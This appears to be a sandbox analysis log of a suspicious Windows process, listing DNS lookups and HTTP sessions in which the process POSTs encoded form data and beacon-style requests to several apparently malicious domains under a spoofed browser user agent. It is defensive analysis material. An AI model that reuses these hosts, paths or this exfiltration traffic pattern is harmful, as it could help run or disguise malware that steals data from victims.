Nov 6, 2024 16:07:34.898325920 CET | 1.1.1.1 | 192.168.2.6 | 0x20da | No error (0) | x105.jieruitech.info | | 192.197.113.67 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 16:07:48.939687967 CET | 1.1.1.1 | 192.168.2.6 | 0xfae6 | No error (0) | www.sadey.info | | 162.0.225.218 | A (IP address) | IN (0x0001) | false
• www.integritywork.shop
• www.ontohealth.net
• www.c6ytv.net
• www.sadey.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49982 | 216.40.34.41 | 80 | 3268 | C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe

Timestamp: Nov 6, 2024 16:07:04.238265038 CET, Bytes transferred: 533, Direction: OUT
Data:
GET /r0a9/?8RN4oRq=ZYHb+yN+RN7ZtjbwI7SB23xqPJJsxDr8Rawhra04/gYnM82mZx5+8Ykp6tR7PNEw3bB584nn/0BLo1rj87ovLgV9i3rHjjPoDRBTQtWr7711poFsTmp7tSOMnBMqrIuiMn54qIs=&SBV8T=1lJpZfbXA4K HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.integritywork.shop
User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Timestamp: Nov 6, 2024 16:07:04.913957119 CET, Bytes transferred: 1236, Direction: IN
Data:
HTTP/1.1 200 OK
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-download-options: noopen
x-permitted-cross-domain-policies: none
referrer-policy: strict-origin-when-cross-origin
content-type: text/html; charset=utf-8
etag: W/"6d62364cd49346e85abc37f82677fe9b"
cache-control: max-age=0, private, must-revalidate
x-request-id: 56569afc-790f-4c1f-a2f2-76a696fbd4e5
x-runtime: 0.006570
transfer-encoding: chunked
connection: close
Data Ascii: 175D<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>integritywork.shop is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source
Timestamp: Nov 6, 2024 16:07:04.913980007 CET, Bytes transferred: 1236, Direction: IN
Data Ascii: =parked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>integritywork.shop</h1><h2>is a totally awesome idea still being worked on.</h
Timestamp: Nov 6, 2024 16:07:04.913992882 CET, Bytes transferred: 1236, Direction: IN
Data Ascii: i><a rel="nofollow" href="https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">
Timestamp: Nov 6, 2024 16:07:04.914166927 CET, Bytes transferred: 1236, Direction: IN
Data Ascii: ,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.
Timestamp: Nov 6, 2024 16:07:04.914180040 CET, Bytes transferred: 848, Direction: IN
Data Ascii: 9t279 115t279 -115t115 -279zM1270 1050q0 -38 -27 -65t-65 -27t-65 27t-27 65t27 65t65 27t65 -27t27 -65zM768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -7
Timestamp: Nov 6, 2024 16:07:04.914280891 CET, Bytes transferred: 691, Direction: IN
Data Ascii: ><nav><ul><li>Copyright &copy; 2024 Hover</li><li><a rel="nofollow" href="https://www.hover.com/tos?source=parked">Terms of Service</a></li><li><a rel="nofollow" href="https://www.hover.com/privacy?source=parked">Privacy</a></li></ul></


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49985 | 3.33.130.190 | 80 | 3268 | C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe

Timestamp: Nov 6, 2024 16:07:20.045763969 CET, Bytes transferred: 787, Direction: OUT
Data:
POST /xqh1/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: close
Content-Length: 212
Content-Type: application/x-www-form-urlencoded
Host: www.ontohealth.net
Origin: http://www.ontohealth.net
Referer: http://www.ontohealth.net/xqh1/
User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Data Ascii: 8RN4oRq=GfkpW16wdgS6iF29Wd+PHsrXL33cxkEydK18iMu+HHojpFIyGuk5jMr+LA/JVnCUBHvoP4kLOuEuUYPNUVn9olBzp1U2sgG8f8ptRa03ywuRDzSs/15tw1k6q71ZxXHlvtQCvyC0pxcIgmHRigEDoo5bVVbRbN9QNXDxlzjUXvDSCHf8vKoW+9zlb2yedP0/py6QJ5X/q4my


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49986 | 3.33.130.190 | 80 | 3268 | C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe

Timestamp: Nov 6, 2024 16:07:22.596735001 CET, Bytes transferred: 811, Direction: OUT
Data:
POST /xqh1/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: close
Content-Length: 236
Content-Type: application/x-www-form-urlencoded
Host: www.ontohealth.net
Origin: http://www.ontohealth.net
Referer: http://www.ontohealth.net/xqh1/
User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Data Ascii: 8RN4oRq=GfkpW16wdgS6jlm9ZeWPBMrYEX3c+EE2dK58iNquE0Mjpl4yHt85kMr+Fg/IYHCPBHjaP5YLOuQuUcHNUm/8u1Bxv1U4jAG8f8ptRawRy2GRDDOs9U5i6Vk9jb1Z1XHpvtRXvzuOp3YIgiDRixECho5dRVaNc90nFHT1jV7RX9vnDxemz5o1stTnb0qsdv0VryCQbubYlMDRyE9THrz0sPMyET4okuiPHA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49987 | 3.33.130.190 | 80 | 3268 | C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:07:25.133986950 CET | 1824 | OUT | POST /xqh1/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: close
Content-Length: 1248
Content-Type: application/x-www-form-urlencoded
Host: www.ontohealth.net
Origin: http://www.ontohealth.net
Referer: http://www.ontohealth.net/xqh1/
User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Data Ascii: 8RN4oRq=GfkpW16wdgS6jlm9ZeWPBMrYEX3c+EE2dK58iNquE0EjpWwyHNA5lMr+NA/VYHDXBH7kP5U9OsoubbHNdzL8g1Bxt1U1sgGpf85pRZYRy2GRDB6s6F5i11k6q71FxXGAvtJHvzqeoH4IgCTRxT8Cuo5fWVaFc9o4FHOOjVn3X+znCn3wn6M8yPjnNF3KcPF+xTGSU8TLjPqz+k5yPbyVmO4zNHdsmc35FoC7tVhaMuKfuPumwezlA5OXAhnYNGH6UnX9EH3N5DB64+dHwWLAIuYgM7sbK2V2S0DeO+2CvV4475ehrUJuRFiWls5UFX7icENEbJvLhMrvOKue1FGWD3MQmSZUfCBsjG+YfoKsa83vrJqVk7D15qqnHzYpUro2kUwxQYvND0yo6mE/nHlGYByu1LDlr5HdMcy98Trp2HyJ7PDCnKVb9SBz25/1Y4fqhpBuH2FSMpEsk9qPpZc8QXNLFc8C18MttZOraX1MRjFnuoaFR7Ydls6qTQNPzlkxeehZ486uXOLWoVJZH92AwgcvyK6RpRH9QS5NzvdDopMXAiCfA1qIXKfnOuaJiQ0RNFT9Pr+tEWq9tcrYiwgtz/nHv61lMkvQlHhhb/seAwZS/5QMdHDJae2OTEHPxcTxnnS5/5Gua0E0iHVKALbz9afRh9VUSB5IU00Z9lypfnwpXPg8QDAFAlWINip/roMnt1yqa4n800bv5/6BtHQ5TL9w7bm3C6FbNMr+mxnkb+E5W4sKCoZy1b+pSWpMGRCk+naH1L4UlZBJYe5yEkzr8XDpTc8fQEFB3Ahe+K6AAE0vpOe81m+f5xquBbk77hXJ/BE31KchUPYtE2h/oYsCWaqIcRLHkvp4/cHpZo2fslLDAqPeLOkx8wM6HCuKa1qdAfNcR3CRhx8UUJcAkF1VWwGAb8yFPmYfHmCHdvpLl0VFaIYAKDIxb2vyeI19BwDBE++uRjPoDZQqWarF9qnB/WC57TX9m78UfVXk9MGnfwKl [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49988 | 3.33.130.190 | 80 | 3268 | C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:07:27.681979895 CET | 529 | OUT | GET /xqh1/?SBV8T=1lJpZfbXA4K&8RN4oRq=LdMJVAe8LjCJtA/hX/WGJbv1EGS8xWceFJt7j7SiEDgChmEUBLc4idOyKCr8dFmuKAy1MvAxa+k6cqr1XzKglkByqns40V6cXeBQfaQQ1061cjyky34X3yYouoYD43fZweF+tEU= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.ontohealth.net
User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Nov 6, 2024 16:07:28.308826923 CET | 417 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 06 Nov 2024 15:07:28 GMT
Content-Type: text/html
Content-Length: 277
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?SBV8T=1lJpZfbXA4K&8RN4oRq=LdMJVAe8LjCJtA/hX/WGJbv1EGS8xWceFJt7j7SiEDgChmEUBLc4idOyKCr8dFmuKAy1MvAxa+k6cqr1XzKglkByqns40V6cXeBQfaQQ1061cjyky34X3yYouoYD43fZweF+tEU="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49989 | 192.197.113.67 | 80 | 3268 | C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:07:34.931627035 CET | 772 | OUT | POST /3tnk/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: close
Content-Length: 212
Content-Type: application/x-www-form-urlencoded
Host: www.c6ytv.net
Origin: http://www.c6ytv.net
Referer: http://www.c6ytv.net/3tnk/
User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Data Ascii: 8RN4oRq=PUepnHly9/OiK5A65xl/mAkQgTsvv9MJW4cYqedfv/EaODEF5nFqUmx/Fgz3kOXkouLntrCHGchkPFsYmspuPKpCoipmjpAJRinVnfg9R+qqflNiTUyiPDL1a98bsQdtQMZVR3JIjQa3zvtFWcvWcSyzqPHmbPG4ZhMI9CMXwjvM4qjBRMCuixJcnzJqsM/m+yJ7F+Q0f9Oz
Nov 6, 2024 16:07:35.910486937 CET | 246 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 06 Nov 2024 15:07:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49990 | 192.197.113.67 | 80 | 3268 | C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:07:37.477932930 CET | 796 | OUT | POST /3tnk/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: close
Content-Length: 236
Content-Type: application/x-www-form-urlencoded
Host: www.c6ytv.net
Origin: http://www.c6ytv.net
Referer: http://www.c6ytv.net/3tnk/
User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Data Ascii: 8RN4oRq=PUepnHly9/OiLd86/gl/qwkTvzsvmdMNW4gYqfZPsNQaPmgF4lhqVmx/PAzuuuXzouWYtr+HGfdkPAIYlfBpOapAuipgnpAJRinVnfkHR+iqfU9iV2ahMDL0d98boQdpQMZ3R2UtjSS3zqpFWIzVWSy13fGTbvrdYwJH/jlvzhOs5cibN/CNwhpenxRYss/M8yx7XpcTQJrQZSmLFt878ZtYgawp9Ao2uQ==
Nov 6, 2024 16:07:38.509207964 CET | 246 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 06 Nov 2024 15:07:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49991 | 192.197.113.67 | 80 | 3268 | C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:07:40.030045986 CET | 1809 | OUT | POST /3tnk/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: close
Content-Length: 1248
Content-Type: application/x-www-form-urlencoded
Host: www.c6ytv.net
Origin: http://www.c6ytv.net
Referer: http://www.c6ytv.net/3tnk/
User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Data Ascii: 8RN4oRq=PUepnHly9/OiLd86/gl/qwkTvzsvmdMNW4gYqfZPsNIaOQ8F4FdqWmx/DgzruuXuouectryxGZZkOiAYguBpXKpAsiphjpBNRi3ZnfUHR+iqfWliWkyhKDL1a98HsQdRQMQIR2gXiiy3yK5FU7bVeSy30fGLbvnOYwFt/jgnziSs4aTsSbGMtCtZ7Goy1ZSn1xxwGYkwP7jJdyuSBedarYZhrddfwyJx9k7KAwamv1PIJUKvd6WyhYx3i2uEdlwUk/KZxly7Wy0OJyYXhka/4V9pTciImIlIdyHQtyd+g37OCBK88s3TV3/bLdw5fBaCm6FQgQagP8/0Mw/gvtl9M5q7aMS6smnahykOEx5FkUfbSVM0ALn9zaxJ2NcI8fmhovWDRukDuQ2ZO6EhPiviwrNN7AAUEiMuitePxBlgVIOC7y/RkY9ZNChGX6GxQtbAFU09fly1tRY/9+dAw/UkMSNfi/QoQ/ATx3Ovjlr4aUaqkPr02AvdFo1vumV7hkVvf3MHvVuQQMU+NOseSJSy00o50q14Y8vRCtSVOmOhCDlgixWxcQB/CljstTqMGTVNJ2+0TXAfDdWylAt2h5yUIg5Ccck0y07EyZpuQqnnX3j/FfAzf9pekdXjZAAJGAcq9nqg6WEbpeiMxFfmSOoFj6AtsihmlFbBHkJ79u/FHtJ5tM2vf0CGbfrwQU5cHup+nhQ0s2l/22hjNrH9gLsbDvDQ9Clmaz5SlTNYMn5tGIlM10klHyG7kJrB7uuiOCoG7HzSrZ16BQLMxI+yyaq5S1mrshdMPDDudY++/xk2tbSjCmNbq/Zud51qRJskyA1MhpX3KWLCTHdkoVTwyUItAydVSLIAzP//ZQUPhenjwahHnUw0PYvgDr89NBmRr72noDi+jtfoI+SfYysOd7hiPOK4PLiwuXSTYH02WeLe6qhab/ZuyyBcmvzBlr5hQapq6ozzLdAp8S3uo3/l4/R1fy8sVdCtU00x14WzAnglGNMx [TRUNCATED]
Nov 6, 2024 16:07:41.202744007 CET | 246 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 06 Nov 2024 15:07:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49992 | 192.197.113.67 | 80 | 3268 | C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:07:42.567240000 CET | 524 | OUT | GET /3tnk/?8RN4oRq=CW2JkxV3pcekLoIorT56ryscgS11ntIpF5Aeg7ZfnKRiExYc+D8BbmUzHwDhufn4r4Dro/61FctGFi0noZVWC4EErF1Fy7sjRinEodY+GdyVC1Z8TkDJNhe4fZdCuwZwItNyPB0=&SBV8T=1lJpZfbXA4K HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.c6ytv.net
User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Nov 6, 2024 16:07:43.562258005 CET | 246 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 06 Nov 2024 15:07:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49994 | 162.0.225.218 | 80 | 3268 | C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:07:48.976064920 CET | 775 | OUT | POST /f8et/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: close
Content-Length: 212
Content-Type: application/x-www-form-urlencoded
Host: www.sadey.info
Origin: http://www.sadey.info
Referer: http://www.sadey.info/f8et/
User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
Data Ascii: 8RN4oRq=aeWve7uq/IHtAOaip6URwp55tJ4SJ21u+/Sw58FoFnGeZPqLt2r6umZr25uMum5fqvmDEsrVrkq+yGRF/WrKYOWWEPKhgeZFXk0v++lVHdOAXzC4dyvYZmB28tM69tYZEEwisUmWIJhVqIwleQXPdprXSTCXyG3yZUwGxxkun4m4QUD71BqkdwUulDLMj4rSmkKvW0Tb1CTC
Nov 6, 2024 16:07:49.640774012 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Wed, 06 Nov 2024 15:07:49 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                             Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                             Session ID: 10 | Source IP: 192.168.2.6 | Source Port: 49995 | Destination IP: 162.0.225.218 | Destination Port: 80 | PID: 3268
                                                                                             Process: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                             Timestamp: Nov 6, 2024 16:07:51.534784079 CET | Bytes transferred: 799 | Direction: OUT
                                                                                             POST /f8et/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Length: 236
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.sadey.info
                                                                                            Origin: http://www.sadey.info
                                                                                            Referer: http://www.sadey.info/f8et/
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Data Raw: 38 52 4e 34 6f 52 71 3d 61 65 57 76 65 37 75 71 2f 49 48 74 42 76 71 69 35 74 49 52 31 4a 35 36 6f 4a 34 53 62 32 31 79 2b 2f 65 77 35 34 38 6c 45 56 69 65 59 76 36 4c 75 30 54 36 76 6d 5a 72 39 5a 75 4a 68 47 35 45 71 6f 76 6a 45 70 54 56 72 6b 2b 2b 79 44 74 46 2f 6e 72 4a 59 65 57 55 64 66 4b 6a 6b 65 5a 46 58 6b 30 76 2b 2f 42 7a 48 63 71 41 57 44 79 34 61 6a 76 62 46 32 42 31 73 4e 4d 36 35 74 59 64 45 45 77 55 73 57 53 77 49 4c 70 56 71 4a 41 6c 64 44 50 4f 58 70 72 64 4d 54 44 36 6a 56 4f 56 66 69 6c 71 2f 48 74 57 7a 71 65 59 59 43 43 68 70 79 71 48 50 67 30 73 6c 42 54 2b 6a 59 72 34 6b 6b 79 76 45 6a 66 38 36 32 32 68 30 4d 71 43 4d 57 30 49 48 68 7a 2f 6b 59 4f 46 75 67 6a 65 43 41 3d 3d
                                                                                            Data Ascii: 8RN4oRq=aeWve7uq/IHtBvqi5tIR1J56oJ4Sb21y+/ew548lEVieYv6Lu0T6vmZr9ZuJhG5EqovjEpTVrk++yDtF/nrJYeWUdfKjkeZFXk0v+/BzHcqAWDy4ajvbF2B1sNM65tYdEEwUsWSwILpVqJAldDPOXprdMTD6jVOVfilq/HtWzqeYYCChpyqHPg0slBT+jYr4kkyvEjf8622h0MqCMW0IHhz/kYOFugjeCA==
                                                                                             Timestamp: Nov 6, 2024 16:07:52.223860025 CET | Bytes transferred: 533 | Direction: IN
                                                                                             HTTP/1.1 404 Not Found
                                                                                            Date: Wed, 06 Nov 2024 15:07:52 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 389
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                             Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                             Session ID: 11 | Source IP: 192.168.2.6 | Source Port: 49996 | Destination IP: 162.0.225.218 | Destination Port: 80 | PID: 3268
                                                                                             Process: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
